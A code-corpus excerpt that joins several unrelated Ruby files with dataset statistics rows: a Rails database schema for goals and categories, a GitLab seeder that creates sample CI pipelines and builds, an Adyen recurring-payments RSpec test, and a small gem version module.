# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2022_02_06_001140) do
create_table "categories", force: :cascade do |t|
t.string "name"
t.integer "user_id", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["user_id"], name: "index_categories_on_user_id"
end
create_table "goals", force: :cascade do |t|
t.string "name"
t.integer "category_id", null: false
t.string "cadence"
t.integer "frequency"
t.string "importance"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["category_id"], name: "index_goals_on_category_id"
end
create_table "users", force: :cascade do |t|
t.string "name"
t.string "email"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
add_foreign_key "categories", "users"
add_foreign_key "goals", "categories"
end
| 38.863636 | 86 | 0.730409 |
5de5339b70e6a3d30b8413703f069beee8cef3e5 | 6,057 | require './spec/support/sidekiq'
class Gitlab::Seeder::Pipelines
STAGES = %w[build test deploy notify]
BUILDS = [
# build stage
{ name: 'build:linux', stage: 'build', status: :success,
queued_at: 10.hour.ago, started_at: 9.hour.ago, finished_at: 8.hour.ago },
{ name: 'build:osx', stage: 'build', status: :success,
queued_at: 10.hour.ago, started_at: 10.hour.ago, finished_at: 9.hour.ago },
# test stage
{ name: 'rspec:linux 0 3', stage: 'test', status: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'rspec:linux 1 3', stage: 'test', status: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'rspec:linux 2 3', stage: 'test', status: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'rspec:windows 0 3', stage: 'test', status: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'rspec:windows 1 3', stage: 'test', status: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'rspec:windows 2 3', stage: 'test', status: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'rspec:windows 2 3', stage: 'test', status: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'rspec:osx', stage: 'test', status_event: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'spinach:linux', stage: 'test', status: :success,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
{ name: 'spinach:osx', stage: 'test', status: :failed, allow_failure: true,
queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
# deploy stage
{ name: 'staging', stage: 'deploy', environment: 'staging', status_event: :success,
options: { environment: { action: 'start', on_stop: 'stop staging' } },
queued_at: 7.hour.ago, started_at: 6.hour.ago, finished_at: 4.hour.ago },
{ name: 'stop staging', stage: 'deploy', environment: 'staging',
when: 'manual', status: :skipped },
{ name: 'production', stage: 'deploy', environment: 'production',
when: 'manual', status: :skipped },
# notify stage
{ name: 'slack', stage: 'notify', when: 'manual', status: :created },
]
EXTERNAL_JOBS = [
{ name: 'jenkins', stage: 'test', status: :success,
queued_at: 7.hour.ago, started_at: 6.hour.ago, finished_at: 4.hour.ago },
]
def initialize(project)
@project = project
end
def seed!
pipelines.each do |pipeline|
begin
BUILDS.each { |opts| build_create!(pipeline, opts) }
EXTERNAL_JOBS.each { |opts| commit_status_create!(pipeline, opts) }
print '.'
rescue ActiveRecord::RecordInvalid
print 'F'
ensure
pipeline.update_duration
pipeline.update_status
end
end
end
private
def pipelines
create_master_pipelines + create_merge_request_pipelines
end
def create_master_pipelines
@project.repository.commits('master', limit: 4).map do |commit|
create_pipeline!(@project, 'master', commit)
end
rescue
[]
end
def create_merge_request_pipelines
pipelines = @project.merge_requests.first(3).map do |merge_request|
project = merge_request.source_project
branch = merge_request.source_branch
merge_request.commits.last(4).map do |commit|
create_pipeline!(project, branch, commit)
end
end
pipelines.flatten
rescue
[]
end
def create_pipeline!(project, ref, commit)
project.pipelines.create(sha: commit.id, ref: ref, source: :push)
end
def build_create!(pipeline, opts = {})
attributes = job_attributes(pipeline, opts)
.merge(commands: '$ build command')
Ci::Build.create!(attributes).tap do |build|
# We need to set build trace and artifacts after saving a build
# (id required), that is why we need `#tap` method instead of passing
# block directly to `Ci::Build#create!`.
setup_artifacts(build)
setup_build_log(build)
build.project.environments.
find_or_create_by(name: build.expanded_environment_name)
build.save
end
end
def setup_artifacts(build)
return unless %w[build test].include?(build.stage)
artifacts_cache_file(artifacts_archive_path) do |file|
build.artifacts_file = file
end
artifacts_cache_file(artifacts_metadata_path) do |file|
build.artifacts_metadata = file
end
end
def setup_build_log(build)
if %w(running success failed).include?(build.status)
build.trace.set(FFaker::Lorem.paragraphs(6).join("\n\n"))
end
end
def commit_status_create!(pipeline, opts = {})
attributes = job_attributes(pipeline, opts)
GenericCommitStatus.create!(attributes)
end
def job_attributes(pipeline, opts)
{ name: 'test build', stage: 'test', stage_idx: stage_index(opts[:stage]),
ref: pipeline.ref, tag: false, user: build_user, project: @project, pipeline: pipeline,
created_at: Time.now, updated_at: Time.now
}.merge(opts)
end
def build_user
@project.team.users.sample
end
def build_status
Ci::Build::AVAILABLE_STATUSES.sample
end
def stage_index(stage)
STAGES.index(stage) || 0
end
def artifacts_archive_path
Rails.root + 'spec/fixtures/ci_build_artifacts.zip'
end
def artifacts_metadata_path
Rails.root + 'spec/fixtures/ci_build_artifacts_metadata.gz'
end
def artifacts_cache_file(file_path)
cache_path = file_path.to_s.gsub('ci_', "p#{@project.id}_")
FileUtils.copy(file_path, cache_path)
File.open(cache_path) do |file|
yield file
end
end
end
Gitlab::Seeder.quiet do
Project.all.sample(5).each do |project|
project_builds = Gitlab::Seeder::Pipelines.new(project)
project_builds.seed!
end
end
| 31.878947 | 93 | 0.666832 |
6ad6212198dd2ab7b6f7c4b496db49849e847240 | 573 | require "spec_helper"
require_relative "../lib/adyen/errors"
RSpec.describe AdyenOfficial::Payments, service: "recurring service" do
# client instance to be used in dynamically generated tests
client = create_client(:basic)
# methods / values to test for
# format is defined in spec_helper
test_sets = [
["list_recurring_details", "creationDate", "2017-03-01T11:53:11+01:00"],
["disable", "response", "[detail-successfully-disabled]"],
["store_token", "result", "Success"]
]
generate_tests(client, "Recurring", test_sets, client.recurring)
end
| 31.833333 | 76 | 0.720768 |
5d35246c26474bd916f8847833282ea4f6bf739b | 42 | module Mkswapfile
VERSION = "0.1.1"
end
| 10.5 | 19 | 0.690476 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.